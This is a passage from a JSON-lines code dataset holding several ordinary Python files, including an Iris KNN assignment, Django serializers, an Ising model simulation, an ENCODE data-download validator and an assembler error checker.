linha[\"volume_largura\"]\n\n # print(altura + '|' + comprimento + '|' + largura)\n text = f'\"{newSku}\",\"{altura}\",\"{comprimento}\",\"{largura}\"'\n x = text\n w.write(text + '\\n')\n usados.append(sku)\n\nprint(f\"Linhas criadas: {cc}\")\n","sub_path":"AtualizarAtributos/relatorios.py","file_name":"relatorios.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"79503435","text":"\"\"\"\nThis module contains unit tests of reorganize_performance_results().\n\"\"\"\n\nfrom data_types import SingleRunPerformanceResult, MultiRunPerformanceResult\nfrom multi_run_in_parallel import MultiRunInParallel\n\n\nSINGLE_RESULT_1 = SingleRunPerformanceResult(\n order_spreading=[0.2, 0.5, 0.7, 0.9, None],\n normal_peer_satisfaction=[0.6, 0.8, 0.5, 1.0],\n free_rider_satisfaction=[0.2, 0.3],\n fairness=None,\n)\n\nSINGLE_RESULT_2 = SingleRunPerformanceResult(\n order_spreading=[0.3, 0.6, 0.8, None, 1],\n normal_peer_satisfaction=[0.8, 0.9, 0.6],\n free_rider_satisfaction=None,\n fairness=None,\n)\n\nSINGLE_RESULT_3 = SingleRunPerformanceResult(\n order_spreading=[0.2, 1.0, 1.0, 1.0, 1.0],\n normal_peer_satisfaction=None,\n free_rider_satisfaction=[0.2, 0.3],\n fairness=None,\n)\n\nSINGLE_RESULT_LIST = [SINGLE_RESULT_1, SINGLE_RESULT_2, SINGLE_RESULT_3]\n\nEXPECTED_RESULT = MultiRunPerformanceResult(\n order_spreading=[\n [0.2, 0.5, 0.7, 0.9, None],\n [0.3, 0.6, 0.8, None, 1],\n [0.2, 1.0, 1.0, 1.0, 1.0],\n ],\n normal_peer_satisfaction=[[0.6, 0.8, 0.5, 1.0], [0.8, 0.9, 0.6]],\n free_rider_satisfaction=[[0.2, 0.3], [0.2, 0.3]],\n fairness=[],\n)\n\n\ndef test_reorganize_performance_results():\n \"\"\"\n This tests reorganize_performance_result() in multi_run_in_parallel.py\n \"\"\"\n real_result = MultiRunInParallel.reorganize_performance_results(SINGLE_RESULT_LIST)\n assert real_result == EXPECTED_RESULT\n","sub_path":"test/single_and_multi_run/test_reorganize_performance_results.py","file_name":"test_reorganize_performance_results.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"440874139","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport plotly.express as px\r\nimport numpy as np\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nimport mysql.connector\r\n\r\nmydb = mysql.connector.connect(\r\n host=\"localhost\",\r\n user=\"root\",\r\n passwd=\"123456\"\r\n)\r\n\r\n#print(mydb)\r\n\r\n#Load Data: The Iris dataset was used in R.A. Fisher's classic 1936 paper, The Use of Multiple Measurements in Taxonomic Problems, and can also be found on the UCI Machine Learning Repository.\r\n\r\n\r\nimport pymysql\r\n\r\nconnection = pymysql.connect(host='localhost',\r\n user='root',\r\n password='123456',\r\n db='iris')\r\n\r\n\r\ncursor=connection.cursor()\r\n\r\ncursor.execute('SELECT * FROM iris.iris')\r\n\r\nfor row in cursor:\r\n print(row)\r\n\r\n\r\n#Data Exploration:\r\nsql01 = cursor.execute('SELECT AVG(SepalLengthCm) FROM iris.iris')\r\nfor row in cursor:\r\n print(row)\r\n\r\nsql02 = cursor.execute('SELECT Sum(SepalLengthCm) FROM iris.iris')\r\nfor row in cursor:\r\n print(row)\r\n\r\nsql03 = cursor.execute('SELECT AVG(PetalLengthCm) FROM iris.iris')\r\nfor row in cursor:\r\n print(row)\r\n\r\nsql04 = cursor.execute('SELECT Sum(PetalLengthCm) FROM iris.iris')\r\nfor row in cursor:\r\n print(row)\r\n\r\n\r\n#Data Wrangling:\r\ndf = pd.read_csv('https://raw.githubusercontent.com/Zchen116/Data602/master/Iris.csv')\r\n\r\ndf = df.drop('Id', axis=1)\r\n\r\ndf.rename(columns = {'SepalWidthCm':'sepal_width', 'SepalLengthCm':'sepal_length', 'Species':'SPECIES'}, inplace = True)\r\n\r\nprint (df)\r\n\r\n#Data Visualizations:\r\n\r\ndf.plot(kind='box', subplots=True, layout=(2,2), sharex=False, sharey=False)\r\n\r\nplt.show()\r\n\r\n#\r\n\r\ndf.hist()\r\n\r\nplt.show()\r\n\r\n#From the graph, we can see two of the input variables have a normal distribution\r\n\r\n\r\nfig = px.scatter(df, x=\"PetalLengthCm\", y=\"PetalWidthCm\", color=\"SPECIES\")\r\n\r\nfig.show()\r\n\r\n#Conclusion: we can see Blue points (Iris-setosa) can be easily separated from red (Irir-versicolor) and green (Iris-virginica) by using PetalLength and PetalWidth.\r\n\r\nfig = px.scatter(df, x=\"sepal_width\", y=\"sepal_length\", color=\"SPECIES\")\r\n\r\nfig.show()\r\n\r\n#Conclusion: the species: Iris-setosa is not really realted to the other two across all feature combinations.\r\n\r\n#Prediction\r\narray = df.values\r\n\r\nX = array[:,0:4]\r\n\r\ny = array[:,4]\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.4, stratify = y)\r\n\r\nknn = KNeighborsClassifier(n_neighbors = 6)\r\n\r\nknn.fit(X_train, y_train)\r\n\r\nprint(knn.score(X_test, y_test))\r\n\r\n#The accuracy is 0.96 or 96%.\r\n\r\n\r\n","sub_path":"assignment 8.py","file_name":"assignment 8.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"91103279","text":"from rest_framework import serializers\nfrom django.utils.translation import ugettext_lazy as _\nfrom samiBackend import CONSTANTES\nfrom samiBackend import models\nfrom samiBackend.notificaciones import notificaciones\n\nclass ConfirmarSerializer(serializers.Serializer):\n ''' \n '''\n\n numeroPk = serializers.IntegerField(required=True, label=_(\"Id Numero\"), \n help_text = _(\"Identificador de numero asociado a notificacion\"))\n\n \n tipo = serializers.ChoiceField(required=True,\n label = _(\"Tipo Notificacion\"),\n help_text = _(\"Tipo de notificacion la cual se esta confirmando\"),\n choices = sorted(notificaciones.TIPO_NOTIFICACIONES.itervalues())\n )\n \n\nclass EnviarNotificacionSerializer(serializers.Serializer):\n '''\n Serializer para probar el envio de notificaciones\n '''\n\n userPk = serializers.IntegerField(required=False, label=_(\"Id Usuario\"), \n help_text = _(\"Identificador de usuario, si es null se usa el usuario autenticado.\"))\n\n tipoDispositivo = serializers.ChoiceField(required=True,\n label = _(\"Tipo Dispositivo\"),\n help_text = _(\"Tipo de dispositivo\"),\n choices = CONSTANTES.TIPO_DISPOSITIVOS.items()\n )\n\n idDispositivo = serializers.CharField(required = True,\n label = _(\"Id Dispositivo\"),\n help_text = _(\"Identificador de dispositivo\")\n )\n\n tipoNotificacion = serializers.ChoiceField(required=True,\n label = _(\"Tipo Notificacion\"),\n help_text = _(\"Tipo de notificacion la cual se esta confirmando\"),\n choices = sorted(notificaciones.TIPO_NOTIFICACIONES.itervalues())\n )\n\n numeroPk = serializers.IntegerField(required=True, label=_(\"Id Numero\"), \n help_text = _(\"Identificador de numero asociado a notificacion\"))\n\n eventoPk = serializers.IntegerField(required=True, label=_(\"Id Evento\"), \n help_text = _(\"Identificador de evento asociado al numero\"))\n\n \n ","sub_path":"SAMI/samiServicios/serializers/notificaciones.py","file_name":"notificaciones.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"509014746","text":"#!/usr/bin/env python3\n\n# https://codeforces.com/problemset/problem/1038/B\n# 构建题的例子往往有误导性!!\n# 非唯一解时不要尝试重现例子..出题人不是带路党\n# n*(n+1)/2 根据n的奇偶性, 将s1设为[1,n-1]或[1,n]\n\ndef f(n):\n if n<3:\n return ['No']\n l = ['Yes']\n l.append('2 1 %d'%(n if n%2==0 else n-1))\n s2 = [n-2] + list(range(2,n-1)) + [n if n%2==1 else n-1]\n l.append(' '.join(map(str,s2)))\n return l\n\nn = int(input())\n[print(r) for r in f(n)]\n","sub_path":"codeforces/constructive构建算法/1100/1038B非互质分割.py","file_name":"1038B非互质分割.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"196374818","text":"#!/usr/bin/env python3\r\nimport socket\r\nimport argparse\r\n\r\ndef get_ip(hostname):\r\n \"\"\" Gets the IP address given a hostname.\r\n\r\n :param hostname: hostname\r\n :return: the ip of the host\r\n \"\"\"\r\n try:\r\n return socket.gethostbyname(hostname)\r\n except:\r\n return \"None\"\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('hostname', help='hostname to get the ip from')\r\n hostname = vars(parser.parse_args())['hostname']\r\n address = get_ip(hostname)\r\n print(\"The IP address of {} is {}\".format(hostname, address))\r\n","sub_path":"get_ip.py","file_name":"get_ip.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"180388610","text":"#本程序可计算六维空间下载一个资源将要消耗的积分\n#XiaZaiXiaoHao\nimport math\ndef JiFen(XiaZai):\n\tif math.log(XiaZai+1)/math.log(2) >33:\n\t\tbianliang1 = 33\n\telse:\n\t\tbianliang1 = math.log(XiaZai+1)/math.log(2)\n\tJiFenXiaZai = XiaZai/(34-bianliang1)\n\t#print(JiFenXiaZai)\n\treturn JiFenXiaZai\n\n#-----------在此输入已下载量 与将要下载量 单位为G--------------\nYiDownload = 30.4 #单位为G\nWillDownload = 10 #单位为G\n#------------勿动下面-----------------------------\n\n\nprint('已下载',YiDownload,'G 已消耗积分数','{:.2f}'.format(JiFen(YiDownload * 1024)))\nWillSpent = JiFen((YiDownload+WillDownload) * 1024) - JiFen(YiDownload * 1024)\nprint('再下载',WillDownload,'G 将消耗积分数', '{:.2f}'.format(WillSpent))\n\n\n","sub_path":"SixWeiJiFen.py","file_name":"SixWeiJiFen.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"188147543","text":"# This program calculates the total energy and magnetization\n# for a 1D Ising model with N dipoles\n# Author: Nico Grisouard, University of Toronto\n# Date: 20 November 2018\n\n# import modules\nfrom numpy import *\nfrom matplotlib.pyplot import *\nfrom random import *\n\n\ndef energyfunction(dipoles):\n \"\"\"\n function to calculate the energy of the lattice\n :param dipoles: a nxn lattice with dipoles\n :type dipoles: array\n :return: float of energy\n :rtype: float\n \"\"\"\n tmp = dipoles.copy()\n horizontal = tmp[:, 0: -1] * tmp[:, 1:]\n vertical = tmp[0: -1] * tmp[1:]\n energy = sum(horizontal) + sum(vertical)\n return -energy\n\n\ndef acceptance(En, Eo, kT):\n \"\"\" Function for acceptance probability\n IN:\n En [float] the new energy\n Eo [float] the old energy\n kT [float] kB*T\n OUT: accepted [bool]\n \"\"\"\n p = exp(-(En - Eo)/kT) # Boltzmann factor\n if En-Eo <= 0 or random() < p:\n accepted = True\n else: # rejected\n accepted = False\n return accepted\n\n\ndef M(dipoles): return sum(dipoles) # total magnetization\n\n\n# define constants\nkB = 1.0\nT = 1.0\nJ = 1.0\nnum_dipoles = 20 # number of dipoles per row\nN = 1000000 # number of flips\n\n# generate array of dipoles\ndipoles = zeros([num_dipoles, num_dipoles], int)\n\nfor i in range(num_dipoles):\n for j in range(num_dipoles):\n if random() < 0.5:\n dipoles[i, j] = 1\n else:\n dipoles[i, j] = -1\n\nenergy = []\nmagnet = []\n\nE = J * energyfunction(dipoles)\nenergy.append(E)\nmagnet.append(M(dipoles))\n\nj = 0 # counter for animation\nanimation_interval = 5000 # plot after every interval\n\nfor i in range(N):\n m = randrange(num_dipoles)\n n = randrange(num_dipoles)\n dipoles[m, n] *= -1 # We flip\n Enew = J * energyfunction(dipoles)\n\n # calculate new energy depending on probability\n flipd = acceptance(Enew, E, kB*T) # this is the next old value\n if flipd:\n E = Enew\n else:\n dipoles[m, n] *= -1 # we de-flip\n\n # animation\n if j > animation_interval:\n clf()\n figure(1)\n title('orientation of dipoles when T = {0}'.format(T))\n imshow(dipoles)\n draw()\n pause(0.01)\n j = 0\n\n # store energy and magnetization\n energy.append(E)\n magnet.append(M(dipoles))\n\n j += 1\n\n# plot energy, magnetization\nfigure()\n\nsubplot(211)\nplot(energy)\ngrid()\nxlabel(\"Number of flips\")\nylabel(\"Total energy\")\n\nsubplot(212)\nplot(magnet)\ngrid()\nxlabel(\"Number of flips\")\nylabel(\"Total magnetization\")\n\ntight_layout()\n# savefig('2D_Ising T = {0}.png'.format(T))\nshow()\n\n# d)\n# As we do a million Monte Carlo flips, the magnetic dipoles tends to stabilize with small variation in orientation\n# after 100,000 flips in general, either all positively oriented or all negatively. The magnet in macro exhibit only one\n# magnetic state, positive or negative,\n# with maximum energy or minimum.\n\n# e)\n# When T=1.0, we can see from the animation that all dipoles tends to be all positive or negative, with small variation\n# in the magnetization graph. However, when we increase the temperature, it is harder for the dipoles to stabilize;\n# there exists big variation in the total magnetization of the magnet.\n","sub_path":"phy407 Computational Physics/Lab11/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"463872500","text":"\"\"\"\nModule to download the experiment files and validate them\n\"\"\"\n\nimport requests\nimport subprocess\nimport os\nimport sys\nimport json\nimport boto\nimport csv\nimport pandas as pd\nfrom urllib.parse import (\n urlencode,\n urlparse,\n)\nfrom pandas.util.testing import assert_frame_equal\n\n# Have to remove these\nAUTHID = 'id'\nAUTHPW = 'pwd'\n\nSERVER = 'https://www.encodeproject.org'\nS3_BUCKET = 'encode-files'\nHEADERS = {'content-type': 'application/json'}\nEPILOG = __doc__\n_PARAMS = {\n 'format': ['json'],\n 'field': [\n 'accession',\n 'files.accession',\n 'files.file_format',\n 'files.paired_end',\n 'files.paired_with',\n 'files.href',\n 'files.replicate.biological_replicate_number',\n 'files.replicate.technical_replicate_number'\n ],\n 'limit': ['all'],\n 'files.file_format': ['bam']\n}\n\n\ndef get_file(href):\n r = requests.get(SERVER + href, headers=HEADERS, allow_redirects=True,\n stream=True)\n try:\n r.raise_for_status\n except:\n print('%s href does not resolve' % (href))\n sys.exit()\n\n s3_url = r.url\n r.close()\n o = urlparse(s3_url)\n filename = os.path.basename(o.path)\n\n #boto.set_stream_logger('boto')\n s3 = boto.connect_s3()\n encode_bucket = s3.get_bucket('encode-files')\n key = encode_bucket.get_key(o.path)\n try:\n key.get_contents_to_filename(filename)\n except:\n response = requests.get(SERVER + href, auth=(AUTHID, AUTHPW),\n allow_redirects=True)\n if response.status_code == 200:\n with open(filename, 'wb') as f:\n f.write(response.content)\n else:\n return None\n return filename\n\n\ndef validate_data(experiment):\n \"\"\"\n Calculates hash for each bam file and also for fastq files.\n Takes into consideration about paired endedness.\n \"\"\"\n checksum = {\n 'bam': {},\n 'fastq': {}\n }\n for f in experiment['files']:\n # Skipping files other than bam and fastq\n if f['file_format'] not in ['fastq', 'bam']:\n continue\n\n # Avoid downloading paired_ended files twice\n if 'paired_end' in f and f['paired_end'] == '2':\n continue\n\n file_names = [get_file(f['href'])]\n if 'replicate' in f:\n biological_rep = str(f['replicate']['biological_replicate_number'])\n technical_rep = str(f['replicate']['technical_replicate_number'])\n else:\n checksum['notification'] = 'No replicate infomation'\n return checksum\n\n if f['file_format'] == 'bam':\n print(\"Calculating checksum for - \" + file_names[0])\n try:\n checksum_bam = subprocess.check_output([\n './BamHash/bamhash_checksum_bam', file_names[0]])\n except subprocess.CalledProcessError as e:\n checksum['notification'] = 'Process error'\n return checksum\n if f['replicate']['biological_replicate_number'] not in \\\n checksum['bam']:\n checksum['bam'][biological_rep] = {}\n checksum['bam'][biological_rep][technical_rep] = checksum_bam\n elif f['file_format'] == 'fastq':\n if 'paired_with' in f:\n paired_file = get_file(f['paired_with'] +\n '@@download/' +\n f['paired_with'][7:-1] + '.fastq.gz')\n print('Calculating checksum for - ' + file_names[0] + ' and ' + paired_file)\n try:\n checksum_fastq = subprocess.check_output([\n './BamHash/bamhash_checksum_fastq',\n file_names[0], paired_file])\n except subprocess.CalledProcessError as e:\n checksum['notification'] = 'Process error'\n return checksum\n file_names.append(paired_file)\n else:\n print(\"Calculating checksum for - \" + file_names[0])\n try:\n checksum_fastq = subprocess.check_output([\n './BamHash/bamhash_checksum_fastq', '-P', file_names[0]])\n except subprocess.CalledProcessError as e:\n checksum['notification'] = 'Process error'\n return checksum\n if f['replicate']['biological_replicate_number'] not in \\\n checksum['fastq']:\n checksum['fastq'][biological_rep] = {}\n checksum['fastq'][biological_rep][technical_rep] = checksum_fastq\n for filename in file_names:\n subprocess.check_output(['rm', filename])\n return checksum\n\n\ndef get_assay_JSON(url):\n \"\"\"\n Input URL and outputs required properties.\n \"\"\"\n path = url + '&' + urlencode(_PARAMS, True)\n response = requests.get(path)\n for exp in response.json()['@graph']:\n yield exp\n\n\ndef bigBedToBed(filename):\n try:\n subprocess.check_output(['./bigBedToBed', filename, filename + '.txt'])\n except:\n subprocess.check_output(['rm', filename, filename + '.txt'])\n print(\"Failed to convert bigBed to bed\")\n return\n\n df = pd.read_csv(filename + '.txt', delimiter='\\t', header=None)\n\n try:\n subprocess.check_output(['rm', filename, filename + '.txt'])\n except:\n print(\"Error converting bigBed to bed - \" + filename)\n return df\n\n\ndef compare_files(bb, bed):\n \"\"\"\n Compare number of peaks first and then content\n \"\"\"\n result = True\n bb_filename = get_file('/files/' + bb + '/@@download/' + bb + '.bigBed')\n if bb_filename is None:\n result = False\n bb_df = bigBedToBed(bb_filename)\n\n bed_filename = get_file('/files/' + bed + '/@@download/' + bed + '.bed.gz')\n if bed_filename is None:\n result = False\n bed_df = pd.read_csv(bed_filename, delimiter='\\t', compression='gzip', header=None)\n if len(bb_df.columns) == 12:\n bb_df = bb_df.sort([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11])\n bed_df = bed_df.sort([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11])\n else:\n bb_df = bb_df.sort([0, 1, 2, 3, 4, 5, 6, 7, 8])\n bed_df = bed_df.sort([0, 1, 2, 3, 4, 5, 6, 7, 8])\n bb_df.index = range(1, len(bb_df) + 1)\n bed_df.index = range(1, len(bed_df) + 1)\n\n try:\n assert_frame_equal(bb_df, bed_df)\n except:\n result = False\n try:\n subprocess.check_output(['rm', bed_filename])\n except:\n print(\"Unable to remove bed file\")\n print(bb + ' ' + bed + ' ' + str(result))\n return result\n\n\ndef parse_tsv(filename):\n with open(filename) as tsvfile:\n tsvreader = csv.reader(tsvfile, delimiter=\"\\t\")\n for line in tsvreader:\n yield line\n\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser(\n description=\"Validate files in each experiment\",\n epilog=EPILOG,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('--url', help=\"ENCODE assay search URL\")\n group.add_argument('--file', help=\"File with UUID or accessions\")\n parser.add_argument('--type', help=\"Data checking type. Options: bed, bam\",\n required=True)\n\n args = parser.parse_args()\n results = []\n if args.type == 'bam':\n for exp in get_assay_JSON(args.url):\n results[exp['accession']] = validate_data(exp)\n elif args.type == 'bed':\n for row in parse_tsv(args.file):\n results.append(row.append(compare_files(row[1], row[0])))\n else:\n print(\"Invalid option entered.\")\n return\n\n with open('data.json', 'w') as outfile:\n json.dump(results, outfile)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":7837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"548756566","text":"# case where any other instruction can call labels - will give a typo\ncorrect = (\"add\", \"sub\", \"ld\", \"st\", \"mul\", \"div\", \"rs\", \"ls\", \"xor\", \"or\", \"and\", \"not\", \"cmp\", \"jmp\", \"jlt\", \"jgt\",\n \"je\", \"hlt\", \"mov\", \"var\")\n\ntypeA = (\"add\", \"sub\", \"mul\", \"xor\", \"or\", \"and\")\ntypeB = (\"rs\", \"ls\")\ntypeC = (\"div\", \"not\", \"cmp\")\ntypeD = (\"ld\", \"st\")\ntypeE = (\"jmp\", \"jlt\", \"jgt\", \"je\")\n\n\ndef error_A(lin, line_no): # ADD R0 R1 R2\n if not(len(lin) == 4):\n print(f\"ERROR: Incorrect syntax in line {line_no}\")\n return True\n\n if len(lin[1]) != 2 or len(lin[2]) != 2 or len(lin[3]) != 2 or lin[1][0] != \"R\" or lin[2][0] != \"R\" or lin[3][\n 0] != \"R\":\n print(f\"ERROR: Typo in register name declaration on line {line_no}\")\n return True\n\n for i in range(1, 4):\n if lin[i][1].isalpha() or int(lin[i][1]) > 6 or int(lin[i][1]) < 0:\n print(f\"ERROR: Illegal register name on line {line_no}\")\n return True\n\n return False\n\n\ndef error_B(lin, line_no): # rs R1 $5\n if not(len(lin) == 3):\n print(f\"ERROR: Incorrect syntax in line {line_no}\")\n return True\n\n if lin[1][0] != \"R\" or lin[2][0] != \"$\":\n print(f\"ERROR: Typo in register/immediate declaration on line {line_no}\")\n return True\n\n if lin[1][1].isalpha() or int(lin[1][1]) > 6 or int(lin[1][1]) < 0:\n print(f\"ERROR: Illegal register name on line {line_no}\")\n return True\n\n if int(lin[2][1:]) > 255 or int(lin[2][1:]) < 0:\n print(f\"ERROR: Illegal immediate value in line {line_no}\")\n\n return False\n\n\ndef error_C(lin, line_no): # div R2 R3\n if not(len(lin) == 3):\n print(f\"ERROR: Incorrect syntax in line {line_no}\")\n return True\n\n if len(lin[1]) != 2 or len(lin[2]) != 2 or lin[1][0] != \"R\" or lin[2][0] != \"R\":\n print(f\"ERROR: Typo in register name on line {line_no}\")\n return True\n\n for i in range(1, 3):\n if lin[i][1].isalpha() or int(lin[i][1]) > 6 or int(lin[i][1]) < 0:\n print(f\"ERROR: Illegal register name declaration on line {line_no}\")\n return True\n\n return False\n\n\ndef error_D(lin, line_no): # ld R1 X\n if not(len(lin) == 3):\n print(f\"ERROR: Incorrect syntax in line {line_no}\")\n return True\n\n if len(lin[1]) != 2 or lin[1][0] != \"R\":\n print(f\"ERROR: Typo in register name on line {line_no}\")\n return True\n\n if lin[1][1].isalpha() or int(lin[1][1]) > 6 or int(lin[1][1]) < 0:\n print(f\"ERROR: Illegal register name declaration on line {line_no}\")\n return True\n\n return False\n\n\ndef error_E(lin, line_no): # jmp X\n if not(len(lin) == 2):\n print(f\"ERROR: Incorrect syntax in line {line_no}\")\n return True\n\n return False\n\n\ndef error_mov(lin, line_no): # mov R1 $4 / mov R1 R2 / mov R1 FLAGS\n if not(len(lin) == 3):\n print(f\"ERROR: Incorrect syntax in line {line_no}\")\n return True\n\n if lin[1][0] != 'R' or len(lin[1]) != 2 or lin[1][1].isalpha() or int(lin[1][1:]) > 6 or int(lin[1][1:]) < 0:\n print(f\"ERROR: Illegal register declaration on line {line_no}\")\n return True\n\n if lin[2][0] != '$' and lin[2][0] != 'R' and lin[2] != 'FLAGS':\n print(f\"Incorrect syntax in line {line_no}\")\n return True\n\n if (lin[2][0] == 'R') and (len(lin[2]) != 2 or lin[2][1].isalpha() or int(lin[2][1:]) > 6 or int(lin[2][1:]) < 0):\n print(f\"ERROR: Illegal register declaration on line {line_no})\")\n return True\n\n if (lin[2][0] == '$') and (int(lin[2][1:]) < 0 or int(lin[2][1:]) > 255):\n print(f\"ERROR: Illegal immediate value in line {line_no}\")\n return True\n\n return False\n\n\ndef check(file): # main function of the program\n line_no = 0\n instruct_count = 0\n defined_var = []\n defined_label = []\n temp = True # empty lines not checked\n\n last = [x for x in file[-1].split()]\n i = -1\n pos = len(file)\n while True:\n if len(last) == 0: # an empty line\n if len(file) > -i: # if all empty lines present\n i -= 1\n last = [x for x in file[i].split()]\n else:\n print(f\"ERROR in line {pos}: halt is not the last instruction.\")\n return True\n\n if len(last) != 0 and last[0] != \"hlt\" and (':' not in file[i]):\n print(f\"ERROR in line {pos}: halt is not the last instruction.\")\n return True\n\n if len(last) != 0 and ':' in file[i]:\n hlt_label_check = last\n if len(hlt_label_check) != 2:\n print(f\"ERROR in line {pos}: halt is not the last instruction.\")\n return True\n if hlt_label_check[0][-1] == ':' and hlt_label_check[1] != 'hlt':\n print(f\"ERROR in line {pos}: halt is not the last instruction.\")\n return True\n\n if len(last) != 0 and (('hlt' == last[0]) or (':' == last[0][-1] and 'hlt' == last[1])):\n break\n\n pos -= 1\n\n position = 0\n for label in file: # Updating labels in list\n position += 1\n lin = [x for x in label.split()]\n if len(lin) == 0: # an empty line\n continue\n\n elif ':' not in lin[0]: # not a label\n continue\n\n elif ':' in lin[0]:\n if ':' != lin[0][-1]:\n print(f\"ERROR: Syntax error in line {position}\")\n return True\n\n elif ':' == lin[0][-1]:\n name = lin[0][:-1]\n if name in defined_label:\n print(f\"ERROR in line {position}: Label was already defined\")\n return True\n defined_label.append(name)\n\n for line in file[:i]: # iterate over each line except last\n lin = [x for x in line.split()]\n line_no += 1\n\n if len(lin) == 0: # empty lines skipped\n continue\n\n if ':' == lin[0][-1]:\n temp = False\n instruct_count += 1\n name = lin[0][:-1]\n if name in defined_var:\n print(f\"ERROR in line {line_no}: A variable of the same name is defined earlier\")\n return True\n lin = lin[1:]\n\n if len(lin) == 0: # empty labels skipped\n continue\n\n if lin[0] not in correct: # checks first word in line\n print(f\"ERROR: Typo in line {line_no}\")\n return True\n\n if lin[0] == 'hlt':\n print(f\"ERROR in line {line_no}: halt is used multiple times \")\n return True\n\n elif lin[0] == 'var' and temp:\n instruct_count += 1\n if len(lin) != 2:\n print(f\"ERROR: Incorrect syntax in line {line_no}\")\n return True\n\n elif lin[1] in defined_var:\n print(f\"ERROR in line {line_no}: Variable was already defined\")\n return True\n\n if lin[1] not in defined_label:\n defined_var.append(lin[1])\n else:\n print(f\"ERROR in line {line_no}: Label of same name was defined earlier \")\n return True\n\n elif lin[0] in typeA:\n temp = False\n instruct_count += 1\n if error_A(lin, line_no):\n return True\n\n elif lin[0] in typeB:\n temp = False\n instruct_count += 1\n if error_B(lin, line_no):\n return True\n\n elif lin[0] in typeC:\n temp = False\n instruct_count += 1\n if error_C(lin, line_no):\n return True\n\n elif lin[0] in typeD:\n temp = False\n instruct_count += 1\n if lin[2] not in defined_var and lin[2] in defined_label:\n print(f\"ERROR in line {line_no}: Misuse of label as variable \")\n return True\n\n elif lin[2] not in defined_label and lin[2] not in defined_var:\n v = lin[2]\n print(f\"ERROR in line {line_no}: Variable ({v}) not defined in the program \")\n return True\n\n elif error_D(lin, line_no):\n return True\n\n elif lin[0] in typeE:\n temp = False\n instruct_count += 1\n if lin[1] not in defined_label and lin[1] in defined_var:\n print(f\"ERROR in line {line_no}: Misuse of variable as label \")\n return True\n\n elif lin[1] not in defined_label and lin[1] not in defined_var:\n v = lin[1]\n print(f\"ERROR in line {line_no}: Label ({v}) not defined in the program \")\n return True\n\n elif error_E(lin, line_no):\n return True\n\n elif lin[0] == 'mov':\n temp = False\n instruct_count += 1\n if error_mov(lin, line_no):\n return True\n\n elif lin[0] == 'var' and not temp:\n print(f\"ERROR in line {line_no}: Variable declared after instruction\")\n return True\n\n elif instruct_count > 256:\n print(\"ERROR: No of instructions exceed 256\")\n return True\n\n return False\n\n","sub_path":"Simple-Assembler/Checkerror.py","file_name":"Checkerror.py","file_ext":"py","file_size_in_byte":9204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"363007311","text":"from abc import ABC, abstractmethod\nfrom typing import List\nimport io\nimport sqlalchemy as sql\n\nfrom schools3.data.base.processor import Processor\nfrom schools3.config.data import db_config\n\n# a wrapper for a table of data. Specified as either a Dataframe or a SQL query\nclass SchoolsTable(Processor):\n def __init__(self, table_name, columns: List[sql.Column], schema_name = db_config.write_schema_name, debug=False):\n super(SchoolsTable, self).__init__(debug=debug)\n\n self.table_name = table_name\n self.schema = schema_name\n self.columns = columns\n self.meta = sql.MetaData()\n self.table = sql.Table(\n table_name, self.meta,\n *columns,\n schema=self.schema\n )\n\n # write this table to the database if it does not exist\n def maybe_create(self):\n if not self.engine.has_table(self.table_name, schema=self.schema):\n self.table.create(self.engine)\n\n # abstract method to get SQL query for this table\n @abstractmethod\n def get_data_query(self):\n pass\n\n # abstract method to get the Dataframe for this table\n @abstractmethod\n def _get_df(self):\n pass\n\n # writes data into the database using a Dataframe\n def insert_from_df(self, use_native_copy=True):\n df = self._get_df()\n table_name = self.table_name\n schema = self.schema\n\n assert not self.engine.has_table(table_name, schema=schema), \\\n f'Table {schema}.{table_name} already exists. Quitting'\n\n if use_native_copy:\n df[:0].to_sql(\n table_name, self.engine, schema=schema,\n index=False\n ) # create raw skeleton of table\n\n data_buf = io.StringIO()\n df.to_csv(data_buf, index=False, header=False)\n data_buf.seek(0)\n\n conn = self.engine.raw_connection()\n ps_curs = conn.cursor()\n\n ps_curs.copy_from(\n data_buf,\n table=f'{schema}.{table_name}',\n sep=',',\n null=''\n )\n\n conn.commit()\n ps_curs.close()\n\n else:\n df.to_sql(\n table_name, self.engine, schema=schema,\n index=False\n )\n\n # writes data into the database using a query\n def insert_from_query(self):\n data_query = self.get_data_query()\n\n assert len(data_query.c) == len(self.columns),\\\n 'number of columns in data query do not match' +\\\n 'the number specifed in __init__'\n\n self.maybe_create()\n ins = self.table.insert().from_select(data_query.c, data_query)\n with self.engine.begin() as conn:\n 